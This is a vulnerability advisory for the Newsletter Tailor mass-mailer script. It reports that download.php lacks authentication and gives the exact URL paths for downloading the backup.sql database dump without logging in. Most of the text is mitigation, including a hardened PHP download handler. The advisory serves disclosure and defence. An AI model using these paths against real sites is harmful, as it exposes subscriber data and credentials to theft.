Vendor: Newsletter Tailor
By: ViRuSMaN
CVSS: 7.5 (HIGH)
Title: Database Backup Dump Vulnerability
CWE: 532
Product Name: Newsletter Tailor
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2020
Newsletter Tailor Database Backup Dump Vulnerability
A vulnerability exists in Newsletter Tailor, a Newsletter/Mass Mailer script with a built-in FTP client and WYSIWYG editor, that allows an attacker to download the database backup from the target website. The cause is the lack of authentication and authorization checks in the download.php file, so the backup.sql file can be retrieved without logging in. The backup is reachable directly at http://[target].com/[path]/admin/download/backup.sql, and it can also be downloaded through http://[target].com/[path]/admin/download/download.php?file=backup.sql.
Mitigation:
The website should add authentication and authorization checks to download.php so that backup.sql cannot be retrieved by unauthenticated users.
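As an added example, not code from Newsletter Tailor, the following is a hardened download.php that applies the mitigation above: it requires an authenticated admin session, accepts only a bare file name, and serves backups from a directory outside the web root. The session key admin_id and the directory /var/lib/newsletter/backups are assumptions.

```php
<?php
// Added example (not Newsletter Tailor's own code): a hardened download handler.
// Assumptions (hypothetical): the admin login sets $_SESSION['admin_id'], and
// backups are stored in BACKUP_DIR, which is outside DocumentRoot, so the direct
// URL .../admin/download/backup.sql no longer maps to a readable file.
declare(strict_types=1);

session_start();

const BACKUP_DIR = '/var/lib/newsletter/backups'; // assumed; not web-accessible

// 1. Authentication: only a logged-in admin may reach this handler at all.
if (empty($_SESSION['admin_id'])) {
    http_response_code(401);
    exit('Authentication required');
}

// 2. Input validation: a bare .sql file name only, never a path or traversal.
$file = $_GET['file'] ?? '';
if (!is_string($file) || !preg_match('/\A[A-Za-z0-9_-]+\.sql\z/', $file)) {
    http_response_code(400);
    exit('Invalid file name');
}

// 3. Containment: resolve both paths and confirm the target stays inside BACKUP_DIR.
$base = realpath(BACKUP_DIR);
if ($base === false) {
    http_response_code(500);
    exit('Backup directory unavailable');
}
$path = realpath($base . DIRECTORY_SEPARATOR . $file);
if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
    http_response_code(404);
    exit('Not found');
}

// 4. Audit trail: log who fetched which backup so misuse can be detected later.
error_log(sprintf('backup download: admin=%s file=%s ip=%s',
    (string) $_SESSION['admin_id'], $file, $_SERVER['REMOTE_ADDR'] ?? '-'));

// 5. Serve the dump without letting intermediaries or the browser cache it.
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $file . '"');
header('Content-Length: ' . (string) filesize($path));
header('Cache-Control: no-store');
readfile($path);
```

Moving the backups out of the web root is what closes the direct backup.sql URL; the checks in the script only protect the download.php route.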